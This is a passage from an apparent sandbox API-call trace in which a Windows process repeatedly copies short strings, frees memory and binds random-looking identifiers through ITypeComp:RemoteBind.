_Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1a6a | out: _Dst=0x87fcf50) returned 0x0 [0061.429] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1a6a | out: _Dst=0x343dbc) returned 0x0 [0061.429] CRetailMalloc_Free () returned 0x7dc0201 [0061.429] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1a8e | out: _Dst=0x87fcf50) returned 0x0 [0061.429] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1a8e | out: _Dst=0x343dbc) returned 0x0 [0061.429] CRetailMalloc_Free () returned 0x7dc0201 [0061.429] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1ab6 | out: _Dst=0x87fcf50) returned 0x0 [0061.430] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1ab6 | out: _Dst=0x343dbc) returned 0x0 [0061.430] CRetailMalloc_Free () returned 0x7dc0201 [0061.430] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1ada | out: _Dst=0x87fcf50) returned 0x0 [0061.430] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1ada | out: _Dst=0x343dbc) returned 0x0 [0061.430] CRetailMalloc_Free () returned 0x7dc0201 [0061.431] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1afe | out: _Dst=0x87fcf50) returned 0x0 [0061.432] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1afe | out: _Dst=0x343dbc) returned 0x0 [0061.432] CRetailMalloc_Free () returned 0x7dc0201 [0061.432] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1b22 | out: _Dst=0x87fcf50) returned 0x0 [0061.432] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1b22 | out: _Dst=0x343dbc) returned 0x0 [0061.432] CRetailMalloc_Free () returned 0x7dc0201 [0061.432] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1b46 | out: _Dst=0x87fcf50) returned 0x0 [0061.433] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1b46 | out: _Dst=0x343dbc) returned 0x0 [0061.433] CRetailMalloc_Free () returned 0x7dc0201 [0061.433] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e1b6a | out: _Dst=0x87fcf50) returned 0x0 [0061.433] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1b6a | out: _Dst=0x343dbc) returned 0x0 [0061.433] CRetailMalloc_Free () returned 0x7dc0201 [0061.433] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1b8e | out: _Dst=0x87fcf50) returned 0x0 [0061.434] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1b8e | out: _Dst=0x343dbc) returned 0x0 [0061.434] CRetailMalloc_Free () returned 0x7dc0201 [0061.434] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1bb2 | out: _Dst=0x87fcf50) returned 0x0 [0061.434] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1bb2 | out: _Dst=0x343dbc) returned 0x0 [0061.434] CRetailMalloc_Free () returned 0x7dc0201 [0061.434] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1bd6 | out: _Dst=0x87fcf50) returned 0x0 [0061.435] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1bd6 | out: _Dst=0x343dbc) returned 0x0 [0061.435] CRetailMalloc_Free () returned 0x7dc0201 [0061.435] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e1bfe | out: _Dst=0x87fcf50) returned 0x0 [0061.435] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1bfe | out: _Dst=0x343dbc) returned 0x0 [0061.435] CRetailMalloc_Free () returned 0x7dc0201 [0061.436] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1c22 | out: _Dst=0x87fcf50) returned 0x0 [0061.436] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1c22 | out: _Dst=0x343dbc) returned 0x0 [0061.436] CRetailMalloc_Free () returned 0x7dc0201 [0061.436] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1c4a | out: _Dst=0x87fcf50) returned 0x0 [0061.436] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1c4a | out: _Dst=0x343dbc) returned 0x0 [0061.436] CRetailMalloc_Free () returned 0x7dc0201 [0061.437] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1c6e | out: _Dst=0x87fcf50) returned 0x0 [0061.437] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1c6e | out: _Dst=0x343dbc) returned 0x0 [0061.437] CRetailMalloc_Free () returned 0x7dc0201 [0061.437] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1c92 | out: _Dst=0x87fcf50) returned 0x0 [0061.437] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1c92 | out: _Dst=0x343dbc) returned 0x0 [0061.437] CRetailMalloc_Free () returned 0x7dc0201 [0061.438] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1cde | out: _Dst=0x87fcf50) returned 0x0 [0061.438] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1cde | out: _Dst=0x343dbc) returned 0x0 [0061.438] CRetailMalloc_Free () returned 0x7dc0201 [0061.438] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1cb6 | out: _Dst=0x87fcf50) returned 0x0 [0061.438] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1cb6 | out: _Dst=0x343dbc) returned 0x0 [0061.438] CRetailMalloc_Free () returned 0x7dc0201 [0061.439] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1d02 | out: _Dst=0x87fcf50) returned 0x0 [0061.439] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1d02 | out: _Dst=0x343dbc) returned 0x0 [0061.439] CRetailMalloc_Free () returned 0x7dc0201 [0061.439] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e1d26 | out: _Dst=0x87fcf50) returned 0x0 [0061.439] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1d26 | out: _Dst=0x343dbc) returned 0x0 [0061.440] CRetailMalloc_Free () returned 0x7dc0201 [0061.440] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1d4a | out: _Dst=0x87fcf50) returned 0x0 [0061.440] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1d4a | out: _Dst=0x343dbc) returned 0x0 [0061.440] CRetailMalloc_Free () returned 0x7dc0201 [0061.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1d72, cbMultiByte=7, lpWideCharStr=0x343d44, cchWideChar=8 | out: lpWideCharStr="BpYAj1") returned 7 [0061.440] ITypeComp:RemoteBind (in: This=0x87ce890, szName="BpYAj1", lHashVal=0x106c83, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x0, pDummy=0xe6c | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x0, pDummy=0xe6c) returned 0x0 [0061.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1d72, cbMultiByte=7, lpWideCharStr=0x343d44, cchWideChar=8 | out: lpWideCharStr="BpYAj1") returned 7 [0061.440] ITypeComp:RemoteBind (in: This=0x87ce668, szName="BpYAj1", lHashVal=0x106c83, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x1, pDummy=0xe6c | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x1, pDummy=0xe6c) returned 0x0 [0061.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1d72, cbMultiByte=7, lpWideCharStr=0x343d44, cchWideChar=8 | out: lpWideCharStr="BpYAj1") returned 7 [0061.441] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="BpYAj1", lHashVal=0x106c83, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x2, pDummy=0xe6c | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x2, pDummy=0xe6c) returned 0x0 [0061.441] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1d72 | out: _Dst=0x87fcf50) returned 0x0 [0061.441] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1d72 | out: _Dst=0x343dbc) returned 0x0 [0061.441] CRetailMalloc_Free () returned 0x7dc0201 [0061.441] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1d96 | out: _Dst=0x87fcf50) returned 0x0 [0061.442] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1d96 | out: _Dst=0x343dbc) returned 0x0 [0061.442] CRetailMalloc_Free () returned 0x7dc0201 [0061.442] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1dbe | out: _Dst=0x87fcf50) returned 0x0 [0061.442] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1dbe | out: _Dst=0x343dbc) returned 0x0 [0061.442] CRetailMalloc_Free () returned 0x7dc0201 [0061.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1de6, cbMultiByte=9, lpWideCharStr=0x343d44, cchWideChar=10 | out: lpWideCharStr="TISha7RL") returned 9 [0061.442] ITypeComp:RemoteBind (in: This=0x87ce890, szName="TISha7RL", lHashVal=0x10c3be, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x0, pDummy=0xe72 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x0, pDummy=0xe72) returned 0x0 [0061.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1de6, cbMultiByte=9, lpWideCharStr=0x343d44, cchWideChar=10 | out: lpWideCharStr="TISha7RL") returned 9 [0061.443] ITypeComp:RemoteBind (in: This=0x87ce668, szName="TISha7RL", lHashVal=0x10c3be, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x1, pDummy=0xe72 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x1, pDummy=0xe72) returned 0x0 [0061.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1de6, cbMultiByte=9, lpWideCharStr=0x343d44, cchWideChar=10 | out: lpWideCharStr="TISha7RL") returned 9 [0061.443] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="TISha7RL", lHashVal=0x10c3be, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x2, pDummy=0xe72 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x2, pDummy=0xe72) returned 0x0 [0061.443] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1de6 | out: _Dst=0x87fcf50) returned 0x0 [0061.443] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1de6 | out: _Dst=0x343dbc) returned 0x0 [0061.443] CRetailMalloc_Free () returned 0x7dc0201 [0061.443] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56e1e0e | out: _Dst=0x87504e0) returned 0x0 [0061.443] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e1e0e | out: _Dst=0x343dbc) returned 0x0 [0061.443] CRetailMalloc_Free () returned 0x1a060101 [0061.444] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56e1e5a | out: _Dst=0x87504e0) returned 0x0 [0061.444] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e1e5a | out: _Dst=0x343dbc) returned 0x0 [0061.444] CRetailMalloc_Free () returned 0x1a060101 [0061.444] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e1e36 | out: _Dst=0x87fcf50) returned 0x0 [0061.444] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1e36 | out: _Dst=0x343dbc) returned 0x0 [0061.444] CRetailMalloc_Free () returned 0x7dc0201 [0061.445] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e1e82 | out: _Dst=0x87fcf50) returned 0x0 [0061.445] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1e82 | out: _Dst=0x343dbc) returned 0x0 [0061.445] CRetailMalloc_Free () returned 0x7dc0201 [0061.445] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1ea6 | out: _Dst=0x87fcf50) returned 0x0 [0061.446] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1ea6 | out: _Dst=0x343dbc) returned 0x0 [0061.446] CRetailMalloc_Free () returned 0x7dc0201 [0061.446] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1eca | out: _Dst=0x87fcf50) returned 0x0 [0061.446] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1eca | out: _Dst=0x343dbc) returned 0x0 [0061.446] CRetailMalloc_Free () returned 0x7dc0201 [0061.447] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1eee | out: _Dst=0x87fcf50) returned 0x0 [0061.447] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1eee | out: _Dst=0x343dbc) returned 0x0 [0061.447] CRetailMalloc_Free () returned 0x7dc0201 [0061.447] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1f12 | out: _Dst=0x87fcf50) returned 0x0 [0061.447] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1f12 | out: _Dst=0x343dbc) returned 0x0 [0061.447] CRetailMalloc_Free () returned 0x7dc0201 [0061.448] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56e1f3a | out: _Dst=0x87504e0) returned 0x0 [0061.448] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e1f3a | out: _Dst=0x343dbc) returned 0x0 [0061.448] CRetailMalloc_Free () returned 0x1a060101 [0061.448] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e1f62 | out: _Dst=0x87fcf50) returned 0x0 [0061.449] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1f62 | out: _Dst=0x343dbc) returned 0x0 [0061.449] CRetailMalloc_Free () returned 0x7dc0201 [0061.449] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56e1f86 | out: _Dst=0x87504e0) returned 0x0 [0061.449] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e1f86 | out: _Dst=0x343dbc) returned 0x0 [0061.449] CRetailMalloc_Free () returned 0x1a060101 [0061.449] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56e1fae | out: _Dst=0x87504e0) returned 0x0 [0061.450] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e1fae | out: _Dst=0x343dbc) returned 0x0 [0061.450] CRetailMalloc_Free () returned 0x1a060101 [0061.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1fd6, cbMultiByte=8, lpWideCharStr=0x343d44, cchWideChar=9 | out: lpWideCharStr="ggeQMCA") returned 8 [0061.450] ITypeComp:RemoteBind (in: This=0x87ce890, szName="ggeQMCA", lHashVal=0x106d43, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x0, pDummy=0xe8c | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x0, pDummy=0xe8c) returned 0x0 [0061.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1fd6, cbMultiByte=8, lpWideCharStr=0x343d44, cchWideChar=9 | out: lpWideCharStr="ggeQMCA") returned 8 [0061.450] ITypeComp:RemoteBind (in: This=0x87ce668, szName="ggeQMCA", lHashVal=0x106d43, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x1, pDummy=0xe8c | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x1, pDummy=0xe8c) returned 0x0 [0061.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1fd6, cbMultiByte=8, lpWideCharStr=0x343d44, cchWideChar=9 | out: lpWideCharStr="ggeQMCA") returned 8 [0061.450] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="ggeQMCA", lHashVal=0x106d43, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x2, pDummy=0xe8c | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x2, pDummy=0xe8c) returned 0x0 [0061.450] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e1fd6 | out: _Dst=0x87fcf50) returned 0x0 [0061.451] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1fd6 | out: _Dst=0x343dbc) returned 0x0 [0061.451] CRetailMalloc_Free () returned 0x7dc0201 [0061.451] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1ffa | out: _Dst=0x87fcf50) returned 0x0 [0061.451] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1ffa | out: _Dst=0x343dbc) returned 0x0 [0061.451] CRetailMalloc_Free () returned 0x7dc0201 [0061.451] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e201e | out: _Dst=0x87fcf50) returned 0x0 [0061.452] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e201e | out: _Dst=0x343dbc) returned 0x0 [0061.452] CRetailMalloc_Free () returned 0x7dc0201 [0061.452] CRetailMalloc_Realloc () returned 0x6220e50 [0061.452] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e2042 | out: _Dst=0x87fcf50) returned 0x0 [0061.452] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e2042 | out: _Dst=0x343dbc) returned 0x0 [0061.452] CRetailMalloc_Free () returned 0x7dc0201 [0061.452] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e206a | out: _Dst=0x87fcf50) returned 0x0 [0061.452] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e206a | out: _Dst=0x343dbc) returned 0x0 [0061.452] CRetailMalloc_Free () returned 0x7dc0201 [0061.453] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e2092 | out: _Dst=0x87fcf50) returned 0x0 [0061.453] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e2092 | out: _Dst=0x343dbc) returned 0x0 [0061.453] CRetailMalloc_Free () returned 0x7dc0201 [0061.453] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e20b6 | out: _Dst=0x87fcf50) returned 0x0 [0061.453] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e20b6 | out: _Dst=0x343dbc) returned 0x0 [0061.453] CRetailMalloc_Free () returned 0x7dc0201 [0061.453] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e20de | out: _Dst=0x87fcf50) returned 0x0 [0061.453] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e20de | out: _Dst=0x343dbc) returned 0x0 [0061.453] CRetailMalloc_Free () returned 0x7dc0201 [0061.454] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e2102 | out: _Dst=0x87fcf50) returned 0x0 [0061.454] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e2102 | out: _Dst=0x343dbc) returned 0x0 [0061.454] CRetailMalloc_Free () returned 0x7dc0201 [0061.454] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e2126 | out: _Dst=0x87fcf50) returned 0x0 [0061.454] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e2126 | out: _Dst=0x343dbc) returned 0x0 [0061.454] CRetailMalloc_Free () returned 0x7dc0201 [0061.454] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56e214e | out: _Dst=0x87504e0) returned 0x0 [0061.455] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e214e | out: _Dst=0x343dbc) returned 0x0 [0061.455] CRetailMalloc_Free () returned 0x1a060101 [0061.455] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e2176 | out: _Dst=0x87fcf50) returned 0x0 [0061.455] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e2176 | out: _Dst=0x343dbc) returned 0x0 [0061.455] CRetailMalloc_Free () returned 0x7dc0201 [0061.455] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e219e | out: _Dst=0x87fcf50) returned 0x0 [0061.455] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e219e | out: _Dst=0x343dbc) returned 0x0 [0061.455] CRetailMalloc_Free () returned 0x7dc0201 [0061.456] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56e21c2 | out: _Dst=0x87504e0) returned 0x0 [0061.456] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e21c2 | out: _Dst=0x343dbc) returned 0x0 [0061.456] CRetailMalloc_Free () returned 0x1a060101 [0061.456] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e21ea | out: _Dst=0x87fcf50) returned 0x0 [0061.456] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e21ea | out: _Dst=0x343dbc) returned 0x0 [0061.456] CRetailMalloc_Free () returned 0x7dc0201 [0061.456] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e2212 | out: _Dst=0x87fcf50) returned 0x0 [0061.456] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e2212 | out: _Dst=0x343dbc) returned 0x0 [0061.456] CRetailMalloc_Free () returned 0x7dc0201 [0061.457] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e2236 | out: _Dst=0x87fcf50) returned 0x0 [0061.457] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e2236 | out: _Dst=0x343dbc) returned 0x0 [0061.457] CRetailMalloc_Free () returned 0x7dc0201 [0061.457] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56e225a | out: _Dst=0x87504e0) returned 0x0 [0061.457] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e225a | out: _Dst=0x343dbc) returned 0x0 [0061.457] CRetailMalloc_Free () returned 0x1a060101 [0061.457] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e2282 | out: _Dst=0x87fcf50) returned 0x0 [0061.458] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e2282 | out: _Dst=0x343dbc) returned 0x0 [0061.458] CRetailMalloc_Free () returned 0x7dc0201 [0061.458] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e22a6 | out: _Dst=0x87fcf50) returned 0x0 [0061.458] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e22a6 | out: _Dst=0x343dbc) returned 0x0 [0061.458] CRetailMalloc_Free () returned 0x7dc0201 [0061.458] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e22ca | out: _Dst=0x87fcf50) returned 0x0 [0061.458] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e22ca | out: _Dst=0x343dbc) returned 0x0 [0061.458] CRetailMalloc_Free () returned 0x7dc0201 [0061.459] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56e22ee | out: _Dst=0x87504e0) returned 0x0 [0061.459] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e22ee | out: _Dst=0x343dbc) returned 0x0 [0061.459] CRetailMalloc_Free () returned 0x1a060101 [0061.459] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e233a | out: _Dst=0x87fcf50) returned 0x0 [0061.459] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e233a | out: _Dst=0x343dbc) returned 0x0 [0061.459] CRetailMalloc_Free () returned 0x7dc0201 [0061.459] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e2316 | out: _Dst=0x87fcf50) returned 0x0 [0061.459] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e2316 | out: _Dst=0x343dbc) returned 0x0 [0061.459] CRetailMalloc_Free () returned 0x7dc0201 [0061.460] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e2362 | out: _Dst=0x87fcf50) returned 0x0 [0061.460] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e2362 | out: _Dst=0x343dbc) returned 0x0 [0061.460] CRetailMalloc_Free () returned 0x7dc0201 [0061.460] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e2386 | out: _Dst=0x87fcf50) returned 0x0 [0061.460] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e2386 | out: _Dst=0x343dbc) returned 0x0 [0061.460] CRetailMalloc_Free () returned 0x7dc0201 [0061.460] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e23ae | out: _Dst=0x87fcf50) returned 0x0 [0061.461] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e23ae | 